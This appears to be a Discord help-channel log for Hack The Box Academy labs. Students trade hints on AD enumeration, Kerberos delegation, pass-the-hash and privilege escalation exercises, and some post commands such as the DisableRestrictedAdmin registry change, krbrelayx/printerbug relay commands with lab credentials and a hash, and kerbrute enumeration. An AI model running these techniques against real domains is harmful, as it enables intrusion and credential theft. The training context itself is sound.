Bruh the Academy Firewall and IDS/IPS Evasion - Medium Lab is broken it gives a different result to the same nmap command if you use your own machine rather than pwnbox

Not broken. Just a weird quirk

How is that not broken? It wasted an hour and a half of my time.

Now I'm wondering how many other labs are randomly not gonna work if I don't use pwnbox

I've only run into it like once or twice

VPN IP always start with tun0 interface and tun1,tun2 if you connect moree

You basically have to look up a reddit post that says the lab doesn't work on your own machine and you must use pwnbox. Would be useful to have that as a hint on the question to not waste people's time.

Kudos for helping him out, I am about to start XSS today so tips like these are invaluable.

Is there a place to report issues with pwnboxes? Yesterday I was working on Attacking Common Services, Attacking DNS and using subbrute with names.txt kept causing a ProcessLookupError exception

Hi beginner here, i'm trying to connect to the mongodb server on the very easy box, i'm getting the error "bash: ./mongosh: cannot execute binary file: Exec format error" , i'm guessing its because the version the tutorial recommends doesnt work for my architecture, and i can't find where to download a different version, anyone got any advice for me?

It worked for me through the VPN, but that's an interesting observation that you get different results between the VPN and pwnbox.

I found the assessment to be quirky. I will admit that much.

My notes don't include much secret sauce but detail my observations about the lab. If you want to share what you were trying we could talk about it. DM's open or here is fine.

Now that I think about it, the lab is a little like Schrodinger's IDS.

figured it out, had to use docker because i have aarch64 architecture.

maybe a warning or something for this box could be warranted as it's "very easy", unless i did something wrong, idk

Try to connect via RDP using the Administrator hash. What is the name of the registry value that must be set to 0 for PTH over RDP to work? Change the registry key value and connect using the hash with RDP. Submit the name of the registry value name as the answer.

Password attack - Pass the Hash (PtH)

So guys,i need to enable restict admin mod
c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

then i connect via rdp, but what da hell i need to answer on this question?

0? 1? 0x0?

the "value name" it is looking for is the text after the /v parameter in your command

Hi im stuck at Attacking DNS from attacking common services module, i have found all the subdomains (i think), but the thing is i cannot find the flag in the dns record.

thx

because your computer does not know to redirect "something.academy.htb" to the assigned ip

relies on host headers to serve the appropriate vhost

if you had every possible subdomain also in your hosts file you could fuzz like that, but you don't

but the nice thing about vhosts is that you can just fuzz the ip and tell it in the hosts header which subdomain you "wanted to visit" and the server will respond accordingly

every possible vhost*

a bit misleading

from evil-winrm why cannot i run diskshadow.exe

because the server doesnt have psychic abilities

academy.htb is not a "real" address, your dns does not know what ip stands behind academy.htb and thats why you have to map it manually in your /etc/hosts file

and since it doesn't know that academy.htb maps to ip 1.2.3.4, it also doesnt know where subdomain.academy.htb maps to

It wont let me type in the other chats but does anyone know if there is a tool that can get the json format of a file or whatever else instead of me having to do it manually?

There certainly should be a better substitute

but you know/assume that all the subdomains are hosted on the same server/ip, so what you can do is you fuzz the same ip and in the host header you "fake" which subdomain you browsed. The webserver is set up to check the host header to know which page to serve you

Yh that's a good idea

Hello can someone help out with "Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system." in WinPrivEsc module? Honestly doing it and for the first time I'm stuck for like couple of hours now. The passwords I was able to obtain are

W1ck3d_g00d_Db_P@ss!
5erv3rAdmin!
l#-x9r11_2_GL!
Str0ng3ncryptedP@ss!

none of them are bob_adm

When trying to use the dirkjanm tools I get a ModuleNotFoundError: No module named 'lib.utils'. Does anyone know how to fix this error?

it is

Make sure you're running the script from the directory where the lib directory is located. You can do this by navigating to that directory in your terminal or command prompt before running the script.

You can add the lib directory to your Python path using the sys.path.insert() method. Add the following code to the top of your script:

import sys
sys.path.insert(0, '/path/to/lib/directory')

Replace '/path/to/lib/directory' with the actual path to the lib directory.

the browser only responds once you put the url you found also in your etc/hosts file

can someone help me by-pass my admin on my school computer because i cant download a virtualbox

Thank you for the suggestion. I just had an error cloning the git repository

I get it, better knowledge about dns.

Anybody?

Maybe don’t use a school computer?

when the uid is 1000,on a docker containter,how do we escape it?there was a machine i did, but i dont remember the technique

have you tried everything shown?

Yes

its a pretty big part of that section

even sticky?

Nothing there

yes there is

Ok let me look again

google

You are right...I was in a tunnel vision. Thanks!!

Can't find

we cant remember what you seen before 😂

theres a lot of methods

probably a uid mapping exploit

Ik,there is a directory with 1000 1000 an I remember this method

I don't know the name ,I know you obtain a shell as the user with this uid

i dont have other pc

hi! i have a problem with question "Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer." in windows fundamental, i tried using command {$_.Status -eq "Running"} | select -First 2 |fl but it showed me a bunch of random processes and none of them are working.

the trick here is to focus on service names not the display name

Oooh okay

i got it thanks

awesome

I am working on the Kerberos Attacks Unconstrained Delegation - Users module and I'm having trouble figuring out what I'm doing wrong. I keep getting a Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' error on the krbrelayx.py side and a DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied error on the printerbug.py side. Can anyone tell me what I am missing please?

Hi, I'm stuck on 2nd flag in Windows Lateral Movement Skills assessment. Can anyone give some hint?

Have you found the file? It's just basic enum here

What kind of file do you mean? Notes.txt or rather some ssh key?

Then you found it .... Just basic enum now

Hi, I am trying to execute SharpHound by evil-winrm connection, but it is not starting... do you know what is the reason?
Evil-WinRM PS C:\Users\tmp> Invoke-Binary SharpHound.exe -c all

Wym

No output at all or failing?

ERROR(S):
Option 'c, collectionmethods' has no value.

Invoke Binary has a weird syntax for passing arguments

Yeah

Try .\

you have to either do Invoke-Binary SharpHound.exe -c,all or Invoke-Binary SharpHound.exe "-c, all"or something

if you call Invoke-Binary without any arguments it tells you the format

Evil-WinRM PS C:\users\tmp> .\SharpHound.exe -c all
worked, thanks!
these dont work, but thanks! Invoke-Binary SharpHound.exe -c,all or Invoke-Binary SharpHound.exe "-c, all"Invoke-Binary SharpHound.exe -c,all or Invoke-Binary SharpHound.exe "-c, all"

Invoke-Binary loads the file from your harddrive, not from the drive where you are connected, it is used to execute a binary without dropping it on disk of the target machine (to avoid AV detection)

if you are able to drop the file on the machine then yea, your syntax with .\ works fine

I'm doing Active directory Enumeration and attacks, and I have spawned the machine and the target machine. I don't have network connectivity on target machine. Is this expected? I can't clone the kerbrute.git

Does anyone have a suggestion for me?

Download on your kali machine and transfer it

Thanks!

And for the nmap scan- sudo nmap -v -A -iL hosts.txt -oN /home/htb-student/Documents/host-enum what is the hosts.txt. Is it the result of the fping scanfping -asgq 172.16.5.0/23

Well you want to scan the hosts that are up

does HttpOnly protects against stored-xss or not?or with stored,you can make any request you want?

only prevents xss from stealing cookies

why are you scanning the 172 range?

the external range is gonna be the 10.129.x.x; then once you get a foothold you'd scan for internal/use a pivoting tool

i suggest also doing the AEN module blind, without reading the material in the module, and referring to it when you're stuck -- this is the closest you'll get to a mock exam

and treating it as one is beneficial for developing a methodology

ok, got it. I'm confused how this is laid out. It makes sense now

spawn the target, give it as much time as you can, then don't even look at the questions

just go find your way to Domain Admin

as the questions can be leading you on to the path

yea, but I don't need to practice to get to domain admin

again it's about helping hone your methodology

the entire module itself is a walkthrough of it

you shouldn't need it to get to DA

after domain compromise then answer the questions

that way you're not relying on the questions to nudge you onto potentially the right path

I'm not relying on question but in order practice AD part, I need to follow through module right? Isn't that the right way?

nope

ok

everything you need to know to move forward is taught to you by the modules preceding it, if doing the CPTS path

everything from service enumeration, to credential harvesting

most of what you learned to do would have been in the AD Enum & Attacks module; and WIndows Privesc module

I'm not doing CPTS Path. I need to get understanding of AD enumeration and attacks. just this module

have you done the prerequisite modules?

there should be a list of modules you should complete before doing the AD Enum & Attacks module

Oh wait

misread

you're on the AD Enum module

my bad

then yeah, read the module

i'm sorry lol

i'm so used to people wanting the hints and stuff for AEN that i misread it

sure, Thanks

also kerbrute should already be installed on the internal parrot host

you shouldn't have to clone it

or do anything

I'll check prerequisite modules

I think Calc was going off the same assumption i was on AEN based on my messages

ok, np

I'll try and read through everthing. I didn't find kerbrute but might have missed it

it'll help with understanding the enumeration and attacks

ok, I'll check

since some topics they expect you to know

got it

Thanks

Could you please share the modules if you don't mind?

you can find it on this page: https://academy.hackthebox.com/module/details/143

I am working on the Kerberos Attacks Unconstrained Delegation - Users module and I'm having trouble figuring out what I'm doing wrong. I keep getting a Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' error on the krbrelayx.py side and a DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied error on the printerbug.py side. Can anyone tell me what I am missing please?

looks like a permission error

Hello, I'm trying to get through page 3 of Introduction to Windows Evasion Techniques Static Analysis -- I have never coded in C# before, I have gen'd my shellcode to add to the given shell injector code....it appears I have to set up VSCode in Parrot, then xfer the payload to the victim...sadly I don't know how to compile nor execute...probably really simple stuff...im under a tight deadline to solve for this as I need an obfuscated payload to bypass MS Defender by next week....advice

seems like I need to go through the Introduction to C# course work first facePalm

I entered the commands ||python3 ~/AD/krbrelayx/addspn.py -u inlanefreight.local\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local||, ||iconv -f ASCII -t UTF-16LE <(printf "jasmine") | openssl dgst -md4||, ||sudo python3 ~/AD/krbrelayx/krbrelayx.py -hashes :1d1998b165c6f302bd1d6f89ecce153d||, ||python3 ~/AD/krbrelayx/printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 roguecomputer.inlanefreight.local||, and ||python3 ~/AD/dementor.py -u carole.rose -p jasmine -d inlanefreight.local roguecomputer.inlanefreight.local dc01.inlanefreight.local||. Are you able to give me a hint what I'm doing wrong?

I also tried it with callum.dixon

That course provides you with a DEV machine. Refer back to the Introduction section to access it for every section. Basically you will need the Introduction section open and another tab open with the section you are working through. Work through the section with the DEV machine, then transfer the products you create to your VM, terminate the DEV machine, spin up the TARGET machine from your current section, and finally upload the products to see if you get the flag.

Or you can just use your own setup to create payloads and whatnot.

Don't think it's needed.
The module pretty much gives you the instructions to compile it and the steps to generate the code

Someone put nuts on my cheese nuts sandwich

Anyone recently did active directory attack - skill assessment 2?

ask the question

Question 4, no idea what to do

its something you can do with a list of users

Thank you

Ik you have to password spray something but I tried different wordlist with kerbrute and didnt give any results. Also responder just giving me DC names, smb gives me one line of text where it's telling me the username and password of the last two questions

try the passwords used in the section

Targeting smb?

the password spray section

But how do I create the users list?

Like the tools that are in that section are either giving me errors or no output or one line

they show two ways to password spray

they show how

Ur talking abt password spraying making a target list right?

yes

there is also another way on windows

hey do modules stay owned forever? like if i unlock every tier 1 and 2 module with my student subscription and then cancel it will i still be able to access them?

yeah i still got the whole path after my sub ended

As I understand it, if you buy it with cubes its yours. If you finish a module while subbed its yours forever including updates.

oh cool

If the tools covered aren't working, try powerview.

Just to be clear , I have to use the tools on ms01 right?

Bc I tried everything from module making target list

Nothing works of whats there

I got one username with kerbrute on DC01 but it's not the answer for question 4

I need help understand the module content to follow along
For this module section https://academy.hackthebox.com/module/143/section/1265-
When I spawn a machine its a Kali machine and other machine which I start is my target machine.
What should I do? Should I setup pivoting to access 172.x.x.x address and do my enumeration and follow along?

you only keep modules you 100% completed

shit

you do what the module discusses

only if its a windows tool

i just got the user using kerbrute

ok module suggest to run this command
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users
When i run kerbrute I get error

It tells you to ssh and run the commands on there

if you want to start a pivot, then do that if you want

How did you get the user with kerbrute if port 88 is closed on ms01?

kerbrute is used against the domain controller

Yes but that user isn't right

I found it too but it said it's wrong

wdym?

And where does it say to run it against the domain controller and not ms01?

thats how kerberos authentication works

you could even copy the kerbrute command and just switch the user list and IP

even if you didnt know how it worked

I am working on the Footprining/DNS Recon module and on the last problem looking for the host with IP ending in .203. I am using dnsenum with Seclists. I've run multiple lists and not getting it. Is there something I am missing or simply just keep running all the Seclists?

Dude I found a user on domain controller with kerbrute it's telling it's wrong

List jjsmith.txt

User starts with a

bro

you dont need to user enum if you already have a valid user

u can make a list of all the domain users with the creds you have

then password spray

Then why is it saying it's wrong on question 4?

Does the user start with a?

you just found a user

you didnt get any creds for them

theres a lot more users

Yea

question 4?

no

Yes

Aight it's too late for this

looks deeper on the sub domains you already have

dm me what ur running

I see "internal" but I cannot run dnsenum against it. Is that the right direction?

try dev

Ah ok I see what's happening

hi

I am having trouble connecting to the target host from my own machine via VPN:

┌─[✗]─[greg@parrot]─[~]
└──╼ $sudo ssh david@inlanefreight.htb@10.129.154.29 -p 2222
[sudo] password for greg: 
ssh: connect to host 10.129.154.29 port 2222: Connection refused

nevermind fixed

I'm having trouble with cracking this file. I know I'm not supposed to FTP in and get the file but how do I pass in this ticket from linux:

carlos@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_91JyEJ
Default principal: svc_workstations@INLANEFREIGHT.HTB

Valid starting       Expires              Service principal
12/06/2024 02:08:32  12/06/2024 12:08:32  krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
    renew until 12/07/2024 02:08:32

this is for question 5 of pass the ticket from linux section of password attacks module

idk

the section should explain what to do

ok I will just reread tomorrow then

I think I just need to let my brain marinate and reread the section

first five questions were easy so I'm sure question 6 is too if I do that

covered under password attacks module i believe

ya

I'm gonna reread section tomorrow

I'm probably missing something

Can anyone give me a hint or point me in the right direction , ad enum and attacks skill assessment 1 question, Connect to the admin on ms01 and get the flag

did you connect to ms01?

I only have a nc session on a windows target and rdp isnt open on the target, and i have sharphoubd zipfile, but cant transfer to linux attackhost to see output.

crackmapexec?

Ill try rhat, using the window as apivot and proxychains crackmapexec

I am still stuck working on the Kerberos Attacks Unconstrained Delegation - Users module and I'm having trouble figuring out what I'm doing wrong. I keep getting a Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' error on the krbrelayx.py side and a DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied error on the printerbug.py side. Can anyone tell me what I am missing please? It was suggested that there is some type of permission error. Do I need to configure something on Windows to allow RPC?

access denied sounds like wrong credentials to me

Have you figured out yet?
Don't include the port in the payload.

What have you tried so far?

what have you tried so far?

What payload did you use?

I wound up figuring it out, thanks for replying

The exercise provides the credentials

it provides the ntlm hash?

i just checked, it doesn't

I can generate a hash. It provides the passwords

||iconv -f ASCII -t UTF-16LE <(printf "C@lluMDIXON") | openssl dgst -md4||

did you craft the SPN?

Yes. For CIFS

as long as spn is correct, and the syntax of the commands are correct, it should just work. that error code specifically indicates a problem with permissions or maybe the spn

so i guess double check your target/creds/etc in the syntax

careful not to spoil stuff

Okay

but yeah you're not using the right creds

I'm still getting the same error with carole.rose

i would make sure all targets/creds are correct and probably restart the target and try again

Was on Reddit looking up how to become a hacker now im here (???)

awesome

Can we reset path progress?

we cannot

🤓

Thanks

But you can use /feedback to let HTB you you want a feature like that

hello goo day guy

hello i need help with Attacking Thick Client Applications
i stuck two days in this one , please help

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

i tried many times to capture the files

@kind harbor

@fathom pendant

What? I was pointing you to a resource

What

Oh sorry I thought u were saying my user out loud. Apologies

?

just ask your question

Stuck on the RDP-access-to-Web01 question in Windows Privesc § Further Credential Theft (67 § 638). Tried LaZagne — no dice. Mimkatz — still nothing. SessionGopher — nothing again. Registry keys where creds are typically stored — again, nothing. So what else is there?

Doesn't help that every single graphical enumeration attempt is being interrupted by the periodically-flickering-desktop issue that @blissful verge needs to be made aware of (see post in #1234357888114364508 about WINLPE-SRV01)

Even managed to spawn a reverse shell on the box as TrustedInstaller (!) to no avail with credentials.

How to hack

I am trying to find the solution of this question , Perform an analysis of C:\Apps\Restart-OracleService.exe and identify the credentials hidden within its source code. Submit the answer using the format username:password. but i do not know what i got wrong

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Cmdkey, meanwhile, is only returning one entry: the administrator. Not a word about WEB01 either.

Oops, never mind, was trying to RDP as the wrong user

That could be an issue 😅

Even so, the performance of the target SUCKS. Takes a full 10 seconds to respond to a single click.

Try to connect over tcp to the vpn. Sometimes that helps

Or switching regions, maybe they destroyed another cable under the ocean

Not going to matter when it's a US region I'm connected to and I'm in California.

Reach out to support for connection related issues

And this is the biggest problem because it causes the PowerShell window to lose focus halfway through typing a command.

hi man, I'm really stuck with this task. can I DM you?

I wanna go for CPTS & CBBH both cert

which one should I go first?

Since most of the CBBH modules are in the CPTS role path already, you kind of get a 2-for-1 deal if you go for the CPTS first. Still have 2 modules to go though…

But anyhow, finally moved on now that I read the fine print about who to connect as for each of the other flags.

Is this where we can ask a question about a module question?

@rose sage you came to the right place

Information Security Introduction to Windows Command Line. Question: Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.

I am using:
where /R C:/ *.txt

but error comes back

+ at line: 1 char:1
+ ~~~~~~~~~~~~~~~```

but i try it on another local machine and it works. Am i doing something wrong?

i have also tried to use find command with similar results.

have you tried C:\ with a backslash?

oh sorry.... yes i just put it backward on this text. I did use \

where /R C:\ waldo.txt
find "waldo" *.txt```

i have tried them all

the only one i have not tried is findstr

okay give me a sec

I didn't do that module yet but I will try that section

Actually, reading the section

you seem to be using powershell

and the section is using cmd instead of powershell

yes thats the one

so you need to get into commandline

enter the cmd command, that should resolve your issue

I think servers are slow i had to reconnect but having issues now.

Try to switch regions, that might help. If not, best to contact support

but the only issue here is being logged into the powershell and not having started the commandline 🙂

ok let me work with this and see what i can do. thanks

When connected, just enter cmd and press enter that will get you into commandline

you were absolutely correct. Did not notice that when i was in there. 🤦‍♂️ Thank you for the help.

wazzup???

hey i am stuck at this que What command language interpreter is used to establish a system shell session with the target? it think the answer to this is meterpreter

module shell & payload in automating payload delivery

you're welcome. let me know if you did it :d

Hello. Please read #welcome and #rules to get you verified

@storm elk just did. Commands work fine when you are actually using it in cmd and not in PS. Did not see the PS in front when i ssh'd in. 🤦‍♂️

no worries 😄

I appreciate your assist!

How i can copy paste from my local machine to PwnBox?

I cant even copy a word

check your browser permissions

???

Isn't it just meterpreter?

yeah but its not correct

cmd /bin/bash /bin/sh are all wrong answer too

Terminal

termianl is a program not a command language interpreter